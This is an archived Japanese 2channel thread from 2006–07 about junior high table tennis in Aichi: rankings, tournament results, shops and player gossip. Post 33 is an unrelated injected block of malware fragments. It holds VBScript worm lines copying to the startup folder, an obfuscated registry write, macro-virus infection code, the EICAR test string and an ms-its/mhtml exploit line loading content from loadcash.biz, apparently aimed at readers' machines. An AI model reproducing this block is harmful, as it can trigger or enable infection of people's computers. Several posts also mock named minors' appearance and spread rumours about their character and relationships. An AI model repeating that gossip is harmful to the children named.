2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

中学卓球を語るスレ【愛知】

1 :名無しQ(・∀・)ノ゜サァン!!:2006/06/22(木) 17:38:30 ID:GmHPWMuF
今はどこが強いんだ?
高蔵はもちろんだが・・
男子は愛工大か?

2 :名無しQ(・∀・)ノ゜サァン!!:2006/06/22(木) 17:56:12 ID:1rCp0Bha
クソスレ終了

3 :名無しQ(・∀・)ノ゜サァン!!:2006/06/22(木) 23:01:09 ID:kP2Wgpi3
せめて【愛知】がついてなければな…
それでもクソスレだが

4 :名無しQ(・∀・)ノ゜サァン!!:2006/06/22(木) 23:42:23 ID:d60EhCVb
やっぱ市川だろ!!

5 :名無しQ(・∀・)ノ゜サァン!!:2006/06/23(金) 02:10:56 ID:7WSxaoC9
お前はいったいなにがしたい

6 :名無しQ(・∀・)ノ゜サァン!!:2006/06/24(土) 00:18:12 ID:ybrvlAK1
三河の方は誰が強いんだ?

7 :名無しQ(・∀・)ノ゜サァン!!:2006/06/24(土) 21:36:31 ID:S3hfzyVu
市川歯並びキモい特に笑うとでもつぇー

8 :名無しQ(・∀・)ノ゜サァン!!:2006/07/12(水) 21:18:38 ID:OhI5cUJd
ag

9 :名無しQ(・∀・)ノ゜サァン!!:2006/07/16(日) 22:47:07 ID:8aKNyfEi
地区大会の結果を教えてください!

10 :名無しQ(・∀・)ノ゜サァン!!:2006/08/04(金) 19:27:18 ID:nK7UQgAp
意味もなく糞スレ立てるのやめてもらえないかな?

11 :名無しQ(・∀・)ノ゜サァン!!:2006/08/07(月) 21:25:40 ID:CKtX2JAC
女子
県優勝 高蔵
準優勝 次郎丸
3位 東浦
3位  ?


12 :名無しQ(・∀・)ノ゜サァン!!:2006/09/22(金) 08:29:18 ID:QjaXtGS0
重複
中学卓球総合スレ
http://sports9.2ch.net/test/read.cgi/pingpong/1091160749/

13 :名無しQ(・∀・)ノ゜サァン!!:2006/10/15(日) 16:42:24 ID:ZYJipzBD
昨日全日本予選負けちゃった。。。

14 :名無しQ(・∀・)ノ゜サァン!!:2006/11/04(土) 20:23:22 ID:c/5kPvEW
みんな!盛り上げて行こう!

15 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 06:59:20 ID:Rrwa4G68
誰か中学生で全日本一般とジュニア両方通過したやついたっけ?

16 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 08:24:53 ID:UzLnDQel
●川は一般シングルもダブルスもジュニアも通過したよ

17 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 12:57:25 ID:Rrwa4G68
市川すごくない?出た種目全部通過じゃん!!他の中学生とは格違いだな!

18 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 17:48:34 ID:8M72PPL/
市川一般通過してない

19 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 18:25:58 ID:UzLnDQel
愛●大の田●に勝って通過したよ

20 :季由:2006/11/05(日) 19:48:04 ID:ab3Y3LUV
入れてくださ〜い
私愛知県の中Aの卓球部でカットマンやってます

21 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 19:56:10 ID:Rrwa4G68
森本とか浜口は一般通過しなかったの?

22 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 20:46:10 ID:SArMujJF
通過してないと思う。

23 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 22:02:54 ID:OcvFYB41
みんなで楽しもう!!              私は、中一です。。。

24 :亀担:2006/11/06(月) 19:08:43 ID:Q/VKeA0y
<20
ゥチゎ名古屋市で中Aの卓球部のカットマンだョ★☆

25 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 23:43:18 ID:3/Jd3Mjg
>>24サンって高蔵????

26 :名無しQ(・∀・)ノ゜サァン!!:2006/11/07(火) 07:30:49 ID:4NtkD9vi
>>25高蔵がこんな所に来るはずないでしょー!

27 :名無しQ(・∀・)ノ゜サァン!!:2006/11/12(日) 23:03:57 ID:fUNALg7g
24が高蔵なら
出○って事になるよね???

28 :おで○:2006/11/12(日) 23:08:08 ID:zuFZW59d
ゥチとかぃゎんしッ!!

29 :名無しQ(・∀・)ノ゜サァン!!:2006/11/13(月) 22:36:25 ID:qJ9v+unl
言うんじゃない???
だって一応名古屋の学校
通ってんだし。

30 :でん笑:2006/11/13(月) 23:02:23 ID:ijOQE5xt
言わないですケド……… だって○○○って言うから!!

31 :名無しQ(・∀・)ノ゜サァン!!:2006/11/16(木) 07:16:29 ID:5ON9Uh86
高蔵のやつなわけないじゃん!!ばかじゃねーの?

32 :もちきんちゃく:2006/11/16(木) 12:51:10 ID:BIQVbBhv
そうだよ!!来るわけないだろ!

33 :名無しQ(・∀・)ノ゜サァン!!:2006/11/16(木) 13:59:58 ID:v7H+nQkw
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


34 :名無しQ(・∀・)ノ゜サァン!!:2006/12/16(土) 12:23:24 ID:KZ7CNZ+W
市川梓って姉ちゃんいるよな?
似てないと思うのは俺だけか?

35 :季由:2006/12/19(火) 18:30:41 ID:xGulS6ag
私は高蔵であごがれのカットマンが二人いるんです〜
出口さんと石田さんです
試合の時にいつも見てます

36 :名無しQ(・∀・)ノ゜サァン!!:2006/12/19(火) 21:16:52 ID:jMeSgJVx
石田わ高蔵じゃありません

37 :名無しQ(・∀・)ノ゜サァン!!:2006/12/19(火) 21:59:32 ID:nLhXcPBt
出口さんかっこいいよね!あこがれるし!

38 :名無しQ(・∀・)ノ゜サァン!!:2006/12/19(火) 23:07:10 ID:jMeSgJVx
加○の方がかっこいいよ☆★藤○は男好きそうな顔してる…

39 :季由:2006/12/20(水) 17:44:32 ID:kjNpK1Sk
石田さんは卓伸クラブですけど,中学は高蔵じゃないんですか?
私,一回試合の時憧れの出口さんと石田さんと喋ってみたいですぅ〜!
私が試合をしてたとき,隣の台に出口さんが来て試合をやってて,すごかったです


40 :おでん:2006/12/20(水) 18:53:11 ID:XDreC/56
出口…今めちゃのびてることない??

41 :季由:2006/12/20(水) 19:42:38 ID:kjNpK1Sk
のびてる,のびてる
出口さんのカットはすっごく落ち着いてて,カットが綺麗で安定
してるんです!
私も出口さんや石田さんみたいなカットが引けるといいなぁ〜

42 :名無しQ(・∀・)ノ゜サァン!!:2006/12/21(木) 00:50:21 ID:HS6ct6la
石○は高蔵じゃないよ。

自分的に出○よりも市○の一番下の子の方が強いと思うんだけどなあ
知ってる?カットマンだよ

43 :季由:2006/12/21(木) 18:14:26 ID:UKpPj1J7
その人って○川さんですよね
知ってます,試合もやった事ありますよ
3-0で負けました......強かったデス

44 :名無しQ(・∀・)ノ゜サァン!!:2006/12/22(金) 20:43:11 ID:lfnpuP2o
〇川の妹に負けるとかどんだけ弱いの?

45 :名無しQ(・∀・)ノ゜サァン!!:2006/12/23(土) 13:21:19 ID:s7aAVf7V
卓伸の子に噂で聞いたんやけど〇川って高蔵やめるん?

46 :季由:2006/12/23(土) 19:11:54 ID:wmfC2gzU
○川さんとは県卓の全日本の県予選の6回戦で当たりました
○川さんつよいですよ〜 それは44番の人がもっと強いだけじゃないですか..
高蔵やめるんデスカ!!なんで....!!!!

47 :名無しQ(・∀・)ノ゜サァン!!:2006/12/23(土) 22:02:48 ID:gSWARLxb
やめないよ

48 :名無しQ(・∀・)ノ゜サァン!!:2006/12/23(土) 22:13:17 ID:QjnWU5WK
○川とか糞だし
真ん中の子は別だけど
姉妹3人とも顔が田舎くさくて昭和時代の人みたい!!

49 :名無しQ(・∀・)ノ゜サァン!!:2006/12/24(日) 06:24:21 ID:zz9LUPCK
↑ひがんでる〜

50 :名無しQ(・∀・)ノ゜サァン!!:2006/12/24(日) 08:26:58 ID:9OsYILn0
46番さんへ
なんか〇川の真ん中のやつがもっと強いとこ行くって聞いたんやけどなあ〜

51 :季由:2006/12/24(日) 17:28:26 ID:R+xYEVd7
私,○川さんと〔一番下の〕試合する前のラケット交換のとき,○川さんの
「お願いします」がちょっと方言ぽかった......
裏粒のラケットで粒が確かロングp-3?だったような...裏は忘れたけど,
タキネスではなかったです

52 :季由:2006/12/24(日) 17:34:43 ID:R+xYEVd7
一色の柴崎さん知ってますか?

53 :名無しQ(・∀・)ノ゜サァン!!:2006/12/24(日) 18:32:13 ID:FJ1NvUgt
知ってるょ

54 :名無しQ(・∀・)ノ゜サァン!!:2006/12/24(日) 21:52:05 ID:XsyIZErU
>>48自分が弱いからってひがんじゃだめだよ。自分はどうなの?勝ってから言おうね。

>>50行かないよ。高校も高○。高○の子から聞いたから。卓○はデマばかりだから。

55 :名無しQ(・∀・)ノ゜サァン!!:2006/12/24(日) 22:38:37 ID:9OsYILn0
でも本当は県外行きたいみたいやで!

56 :名無しQ(・∀・)ノ゜サァン!!:2006/12/25(月) 08:10:58 ID:t3hQ9BAk
そうなんだ。確かに高〇やめて県外行ったほうが強くなりそうだよな!!

57 :季由:2006/12/25(月) 18:34:04 ID:/wlDPjnt
高蔵は結構強いと思うけどな〜
柴崎さんはすごい..上手だと思います!前に比べてめっちゃ強くなってきて
るし,顔すっごい可愛いと思います!!
私は高蔵の出口さんと卓伸の石田さんのカットが頭から離れません!ってか,
出口さんのカット綺麗すぎデスゥ〜!!
明日は一宮女子校に合宿だぁ〜!!かんばるぞ


58 :名無しQ(・∀・)ノ゜サァン!!:2006/12/26(火) 18:20:21 ID:kfAUGZ22
愛知県のカットマンとかみんな雑魚だし!やっぱ石垣だろ!

59 :季由:2006/12/27(水) 19:44:07 ID:8ry7xtOK
誰?ごめんなさい.....知りません
そういえば.高蔵って1月8日の団体の
全日本選抜卓球大会の県予選を
辞退したそうですよ.......

60 :名無しQ(・∀・)ノ゜サァン!!:2006/12/28(木) 08:20:35 ID:qlGA4CmB
そりゃ人数がいないからじゃない?

61 :季由:2006/12/28(木) 21:15:26 ID:7RpecDxj
そんなに人数すくないんですか?
団体は組める人数だとは思うんですけど.......
愛知の強い中学の女子でカッコ可愛い選手って誰がいますかね?
たとえば高○の出口さんとか,岩倉○部の谷田さんとか...












62 :名無しQ(・∀・)ノ゜サァン!!:2006/12/30(土) 20:39:24 ID:R2CeeOs3
そいつらみんな雑魚じゃねー?強いのは市〇とか北〇だろ!!

63 :季由:2006/12/30(土) 21:18:10 ID:1X2McaQL
私の憧れの出○さんも石○さんも緒○さんも強いですよ〜
市○さんとかも強いけど....

64 :名無しQ(・∀・)ノ゜サァン!!:2006/12/30(土) 21:25:49 ID:R2CeeOs3
そいつら全員カットマンやん!しかも誰も全中通過してないし…。みんな雑魚!!

65 :季由:2006/12/30(土) 21:54:24 ID:1X2McaQL
私はカットマンで憧れのカットマンです


66 :名無しQ(・∀・)ノ゜サァン!!:2006/12/30(土) 22:14:27 ID:yQXtAkVm
岩倉南部中の谷〇って娘は新人優勝してるなぁ…なかなか強いんやな。

67 :名無しQ(・∀・)ノ゜サァン!!:2006/12/31(日) 13:02:07 ID:4pQ5TrUI
市〇ってラケットとラバー何使ってる?

68 :季由:2006/12/31(日) 14:01:21 ID:QrSpqtSG
下の妹のカットマン市○さんは裏粒のラケットで粒が確かロングp-3?
だったような...裏は忘れたけど,
タキネスではなかったです


69 :名無しQ(・∀・)ノ゜サァン!!:2006/12/31(日) 16:01:15 ID:4pQ5TrUI
真ん中の人のお願いします!!

70 :季由:2006/12/31(日) 20:13:31 ID:QrSpqtSG
真ん中の人はちょっとわからないな〜
私がやった事あるのは,下の妹のカットマン市○さんしかないから...
真ん中の人は確か攻撃マンですよね

71 :名無しQ(・∀・)ノ゜サァン!!:2006/12/31(日) 22:57:27 ID:4pQ5TrUI
真ん中のやつが知りたいんだよなー。どうやったらあんなすげえボールでるんだろ!!男の俺よりよゆーで速い!!!!

72 :季由:2007/01/01(月) 10:41:56 ID:G/vCBjFk
そうなんだ.....

73 :名無しQ(・∀・)ノ゜サァン!!:2007/01/01(月) 19:55:05 ID:j3U0Js15
愛知中学生で卓球強いやつで誰か付き合ってるやついねー??

74 :季由:2007/01/01(月) 20:33:50 ID:2en+b4Td
高蔵の藤井さんと
名電の北村くんがつきあってるよ!

75 :名無しQ(・∀・)ノ゜サァン!!:2007/01/01(月) 21:40:42 ID:j3U0Js15
そいつらしかいねーの??

76 :季由:2007/01/02(火) 10:44:31 ID:onj7WV7z
74番  季由って書いてあるけど私じゃない!
    北村君と藤井さんって高校生?私は中学だから........


77 :季由:2007/01/02(火) 10:46:06 ID:onj7WV7z
1月8日の試合で名電の北村君を探してみます!

78 :名無しQ(・∀・)ノ゜サァン!!:2007/01/02(火) 11:36:29 ID:7lqPHLbP
附中でカッコイイのは森本・北村・神山でキモイのは平原で普通なのは清野・加藤

79 :名無しQ(・∀・)ノ゜サァン!!:2007/01/02(火) 13:53:12 ID:dn+W0QwN
北村君と森本君はかっこいいよね♪♪しかも強いし(σ・∀・)σ

80 :季由:2007/01/02(火) 15:22:23 ID:pKIITWN/
由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季由季

81 :名無しQ(・∀・)ノ゜サァン!!:2007/01/02(火) 16:34:08 ID:7lqPHLbP
カッコイイかもしんないけど森〇のほう女好き!

82 :季由:2007/01/02(火) 17:58:12 ID:onj7WV7z
80番が.......名前パクんなっ!!
みんなって中学生?

83 :季由:2007/01/02(火) 18:18:10 ID:pKIITWN/
パクってない!
季由はわたしです!

84 :由季:2007/01/02(火) 18:32:44 ID:onj7WV7z
なら82番の季由は由季に変えます

85 :由季:2007/01/02(火) 18:49:42 ID:pKIITWN/
じゃあ私も変えよ!
由季でーす☆

86 :由季:2007/01/02(火) 21:29:02 ID:onj7WV7z
パクってるじゃん!!

87 :名無しQ(・∀・)ノ゜サァン!!:2007/01/02(火) 23:08:47 ID:7lqPHLbP
浜口って名電やめたのか?

88 :名無しQ(・∀・)ノ゜サァン!!:2007/01/03(水) 02:04:55 ID:ACFYLH1M
浜口、性格よさそう

89 :名無しQ(・∀・)ノ゜サァン!!:2007/01/03(水) 07:57:54 ID:218jvWKz
森本の性格は?

90 :名無しQ(・∀・)ノ゜サァン!!:2007/01/03(水) 13:49:52 ID:B1QoVs06
その人達って中学生?

91 :名無しQ(・∀・)ノ゜サァン!!:2007/01/03(水) 18:50:05 ID:OAjIm4FR
彼女いるの北村君だけ?

92 :名無しQ(・∀・)ノ゜サァン!!:2007/01/03(水) 19:14:12 ID:218jvWKz
だけじゃない?実際顔いいの北村っしょ?

93 :名無しQ(・∀・)ノ゜サァン!!:2007/01/04(木) 09:27:59 ID:yuyExAfc
顔だったら普通にかっこいい子いるし、顔より性格でしょ!北村君はかなり真面目そう( ̄口 ̄)

94 :名無しQ(・∀・)ノ゜サァン!!:2007/01/04(木) 16:14:14 ID:0xU6EDXh
顔も性格も北村が一番!!森本は顔はましかも?しれんけど性格やばいらしいぞ。俺は森本のいろんな噂聞いた!

95 :名無しQ(・∀・)ノ゜サァン!!:2007/01/04(木) 16:50:48 ID:JKwJonQt
いろんな噂って何[

96 :名無しQ(・∀・)ノ゜サァン!!:2007/01/04(木) 18:37:46 ID:koi9ZxRu
北村は名電で嫌われてるよ。性格悪すぎだから…
臭いしね。

97 :名無しQ(・∀・)ノ゜サァン!!:2007/01/04(木) 18:51:15 ID:7FXihd8y
北村kに軽くやられた・・。。ヽ( ̄Д ̄〃)ノ


98 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 00:01:27 ID:yuyExAfc
森本は楽しいし、いい奴だから

99 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 03:17:21 ID:k0yZUCuP
すみません。15年ぶりに卓球を再開するのですが、愛知県で卓球のラケットや
ラバーなどの道具が充実しているショップはどこがお勧めでしょうか?
教えてください。

100 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 07:47:52 ID:cD5x8IPZ
ひゃく(^_-)-☆

101 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 08:57:52 ID:jlIxo81c
だけど森本俺と試合した時すげぇ態度悪かったぞ??

102 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 09:39:56 ID:ubZfzl4b
>99 今池にある田中スポーツか熱田にあるタクシンスポーツがよろしいかと思います。

103 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 12:50:10 ID:UaycqwZQ
浜口いいだろ

104 :季由:2007/01/06(土) 17:24:01 ID:xoxF2CFe
タクシンスポーツは種類豊富ですよね

105 :名無しQ(・∀・)ノ゜サァン!!:2007/01/06(土) 22:01:13 ID:SXayMh9c
愛知の中学生で卓球最強なのは?

106 :季由:2007/01/06(土) 23:54:46 ID:p2tOEdGj
わたしが一番最強!!

107 :由季:2007/01/07(日) 19:55:54 ID:FTuYXQ8n
団体はだいたい
    〔女子〕高蔵や志段味や岩倉南部や次郎丸や
        一色や東浦や水野や岡崎北とかじゃないんですか
            

108 :名無しQ(・∀・)ノ゜サァン!!:2007/01/07(日) 20:47:01 ID:YhcrGwzM
男子で最強なのは…森本!女子で最強なのは…市川!じゃないか??

109 :名無しQ(・∀・)ノ゜サァン!!:2007/01/07(日) 23:46:13 ID:nmAtIASP
今、中学校で名電以外で順位つけるとどこが強いの?

110 :名無しQ(・∀・)ノ゜サァン!!:2007/01/08(月) 14:59:05 ID:yTbVJHKR
市〇ってどっかのスポンサーと契約するって聞いたんだけど…。
デマかな?

111 :名無しQ(・∀・)ノ゜サァン!!:2007/01/08(月) 23:28:32 ID:bL3EeaQ5
選抜東浦優勝しましたね

112 :名無しQ(・∀・)ノ゜サァン!!:2007/01/09(火) 15:25:13 ID:fR0oAERJ
↑↑男子の決勝がすごい迫力があった 
  優勝は前林だけど 南山の勢いがすごかった.....

女子ではやっぱ東浦が圧倒的に強かった


113 :名無しQ(・∀・)ノ゜サァン!!:2007/01/09(火) 21:45:58 ID:pQp1cjO0
110>
市川はNittakuがスポンサーに付いてるぞ。

114 :名無しQ(・∀・)ノ゜サァン!!:2007/01/10(水) 16:41:59 ID:n+zxRlsk
市川さんって凄いね!

115 :名無しQ(・∀・)ノ゜サァン!!:2007/01/10(水) 18:50:20 ID:OXDYQxrf
112
南山が優勝したんじゃないの?

116 :名無しQ(・∀・)ノ゜サァン!!:2007/01/10(水) 21:20:46 ID:3p3xGm5X
Nittakuじゃなくてどっかの会社と契約するみたいに聞いたんだけど…。

117 :112:2007/01/10(水) 21:35:06 ID:n+zxRlsk
116∠私はよく知らないんですけど,そうなんですか?
  でも南山の試合は凄かった!!

118 :112:2007/01/10(水) 21:37:15 ID:n+zxRlsk
115が116になってました

119 :112:2007/01/12(金) 19:57:27 ID:bxemlzsq
ごめん間違えました
南山は優勝してました

120 :名無しQ(・∀・)ノ゜サァン!!:2007/01/12(金) 21:45:41 ID:kFay1WTW
選抜の予選とかどうでもいいですよ〜。僕は浜口君のファンだったんですけど福岡帰っちゃいましたね↓↓

121 :名無しQ(・∀・)ノ゜サァン!!:2007/01/13(土) 20:19:10 ID:XLcXz2j5
南山中は全国か〜
北海道い〜な〜

122 :名無しQ(・∀・)ノ゜サァン!!:2007/01/14(日) 02:04:22 ID:/YosQCNY
卓伸の石田ってやつキモくて性格悪そうだよね!しかもぜったいぶりっこだしね

123 :季由:2007/01/14(日) 12:53:48 ID:ZeE85Q5f
もっもしかして....卓伸クラブのいっ石田さんっ!!!!!!!!!
私の三大憧れカットマンの一人じゃないですか!
私,石田さんとしゃべったことはないげど,顔はけっこう可愛いじゃないですか?
性格はわかんないけど,ぶりっ子なんですか?


124 :季由:2007/01/15(月) 17:36:35 ID:oY3byCy/
ってか石田さんってどんな性格なんですか?

125 :名無しQ(・∀・)ノ゜サァン!!:2007/01/17(水) 17:57:21 ID:UEg6as4H
石田さんのようなカットマンになりたい

126 :名無しQ(・∀・)ノ゜サァン!!:2007/01/17(水) 20:52:31 ID:rOGbKmqP
石田とかしょぼい

127 :名無しQ(・∀・)ノ゜サァン!!:2007/01/17(水) 20:54:28 ID:QFj/E1Oc
てかキモイ

128 :季由:2007/01/19(金) 19:48:41 ID:5RFd1VGk
何で?


18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)